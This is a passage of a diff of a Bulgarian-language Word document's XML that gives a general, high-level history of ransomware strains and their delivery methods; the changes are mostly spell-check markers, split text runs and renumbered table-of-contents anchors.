+</ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
@@ -7161,15 +7498,15 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9EC5290A-2DE6-49DB-A151-226064C42EFF}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EC25E0E9-ED1E-4DED-B1D8-B99F35F6AB52}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -7188,14 +7525,6 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9EC5290A-2DE6-49DB-A151-226064C42EFF}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
-</file>
-
 <file path=docMetadata/LabelInfo.xml><?xml version="1.0" encoding="utf-8"?>
 <clbl:labelList xmlns:clbl="http://schemas.microsoft.com/office/2020/mipLabelMetadata">
   <clbl:label id="{0cf7ac0a-4681-4823-ab0b-04ef02c5f873}" enabled="1" method="Standard" siteId="{42f7676c-f455-423c-82f6-dc2d99791af7}" contentBits="0" removed="0"/>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -327,7 +327,51 @@
           <w:szCs w:val="40"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Какво представлява ransomware? Стратегии и защита от ransomware.</w:t>
+        <w:t xml:space="preserve">Какво представлява </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">? Стратегии и защита от </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -499,7 +543,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223346797" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346837" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -527,7 +571,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346797 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346837 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -570,7 +614,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346798" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346838" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -605,7 +649,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346798 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346838 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -648,7 +692,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346799" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346839" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -683,7 +727,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346799 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346839 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -727,7 +771,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346800" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346840" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -777,7 +821,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346800 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346840 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -821,7 +865,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346801" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346841" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -886,7 +930,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346801 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346841 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -930,7 +974,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346802" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346842" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -974,7 +1018,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346802 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346842 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1018,7 +1062,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346803" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346843" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1084,7 +1128,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346803 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346843 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1128,7 +1172,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346804" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346844" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1186,7 +1230,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346804 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346844 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1229,7 +1273,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346805" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346845" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1264,7 +1308,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346805 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346845 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1308,7 +1352,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346806" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346846" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1365,7 +1409,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346806 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346846 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1409,7 +1453,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346807" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346847" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1431,21 +1475,7 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Превенция на инт</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>е</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>рнет-достъпни уязвимости</w:t>
+              <w:t>Превенция на интернет-достъпни уязвимости</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1466,7 +1496,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346807 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346847 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1510,7 +1540,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346808" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346848" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1531,15 +1561,7 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t xml:space="preserve">Компрометирани </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>credentials</w:t>
+              <w:t>Компрометирани пароли</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1560,7 +1582,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346808 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346848 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1603,7 +1625,7 @@
               <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346809" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346849" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1630,7 +1652,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346809 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346849 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1692,7 +1714,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223346797"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223346837"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -1709,8 +1731,13 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:t>Рансъмуерът </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Рансъмуерът</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">е вид зловреден софтуер, който криптира файлове и ограничава достъпа до дадена система. Хакерът изисква откуп от ощетения, обикновено парична сума (в биткойн), в замяна откраднатите данни. </w:t>
@@ -1784,7 +1811,15 @@
         <w:tab/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (ransomware) могат сериозно да нарушат бизнес процесите. Организациите често губят достъп до важна информация, необходима за нормалната им работа и предоставяне на критични услуги.</w:t>
+        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) могат сериозно да нарушат бизнес процесите. Организациите често губят достъп до важна информация, необходима за нормалната им работа и предоставяне на критични услуги.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -1860,7 +1895,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223346798"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223346838"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -1920,7 +1955,31 @@
         <w:t xml:space="preserve"> атаки е: “</w:t>
       </w:r>
       <w:r>
-        <w:t>AIDS trojan (PC Cyborg Virus)</w:t>
+        <w:t xml:space="preserve">AIDS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trojan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (PC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cyborg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Virus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1983,11 +2042,29 @@
       <w:r>
         <w:t xml:space="preserve">През 2013 г. се появява </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>CryptoLocker</w:t>
       </w:r>
-      <w:r>
-        <w:t>, което бележи повратен момент в развитието на ransomware. Този нов вид изнудващ зловреден софтуер използва плащания чрез Bitcoin и прилага по-съвременни криптографски методи. Той използва 2048-</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, което бележи повратен момент в развитието на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Този нов вид изнудващ зловреден софтуер използва плащания чрез </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bitcoin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи. Той използва 2048-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2029,7 +2106,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223346799"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223346839"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -2056,7 +2133,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223346800"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223346840"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2092,7 +2169,31 @@
         <w:t xml:space="preserve"> е показано, съобщението, което се визуализира на системата афектирана от троянския кон - </w:t>
       </w:r>
       <w:r>
-        <w:t>AIDS trojan (PC Cyborg Virus)</w:t>
+        <w:t xml:space="preserve">AIDS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trojan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (PC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cyborg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Virus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
@@ -2304,7 +2405,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223346801"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc223346841"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2343,11 +2444,19 @@
       <w:r>
         <w:t xml:space="preserve"> Към вирусите се прилагат по-силни криптиращи алгоритми. </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Archiveus Trojan</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Archiveus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Trojan</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> е първият вирус да използва асиметричен алгоритъм за криптиране на данни – </w:t>
@@ -2526,21 +2635,31 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Archiveus Trojan</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Archiveus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Trojan</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> криптира всичко в </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>MyDocuments</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> директорията (фиг. 4) и изисква от потърпевшия да закупи артикули от онлайн аптека, в замяна ще получи 30 символен код, за да възстанови всичките си файлове.</w:t>
       </w:r>
@@ -2551,7 +2670,15 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> някои от файловете остават коруптнати. </w:t>
+        <w:t xml:space="preserve"> някои от файловете остават </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>коруптнати</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2664,13 +2791,23 @@
         </w:rPr>
         <w:t xml:space="preserve">зглед на </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Archiveus Trojan</w:t>
+        <w:t>Archiveus</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Trojan</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2715,7 +2852,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223346802"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223346842"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2758,7 +2895,15 @@
         <w:t xml:space="preserve">капитал </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често фишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
+        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>фишинг</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2782,8 +2927,16 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>spear phishing ransomware. GPCode</w:t>
-      </w:r>
+        <w:t xml:space="preserve">spear phishing ransomware. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GPCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> се разпространява през електронни пощи като прикачен файл под формата на заявление за работа. </w:t>
       </w:r>
@@ -2847,32 +3000,50 @@
       <w:r>
         <w:t xml:space="preserve">Първите версии на </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>GPCode</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> използват симетрично криптиране, където </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">ключът за криптиране и декриптиране е един и същ. Това го прави лесен за разбиване. Друг недостатък на първоначалния </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">GpCode, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GpCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">е че файловете, които се криптират се запазват на нова локация, а некриптираните се изтриват. </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Undeletion utility</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Undeletion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> utility</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> може да възстанови част от файловете.</w:t>
@@ -3001,8 +3172,18 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> GPCode</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>GPCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3129,6 +3310,7 @@
         </w:rPr>
         <w:t xml:space="preserve">нструкции за откуп, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3137,6 +3319,7 @@
         </w:rPr>
         <w:t>GPCode</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3171,7 +3354,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223346803"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc223346843"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3202,8 +3385,15 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>LockerPin</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> е първият </w:t>
       </w:r>
@@ -3220,7 +3410,21 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> – LockerPin.</w:t>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LockerPin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Опитва да достъпи административни правомощия маскирайки се като софтуерен ъпдейт на телефона, виж фигура 7.</w:t>
@@ -3339,7 +3543,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223346804"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc223346844"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3443,7 +3647,39 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t>За да оптимизират атаките си, ransomware операторите променят стратегията си. Те се отказват от метода „spray and pray“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
+        <w:t xml:space="preserve">За да оптимизират атаките си, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> операторите променят стратегията си. Те се отказват от метода „</w:t>
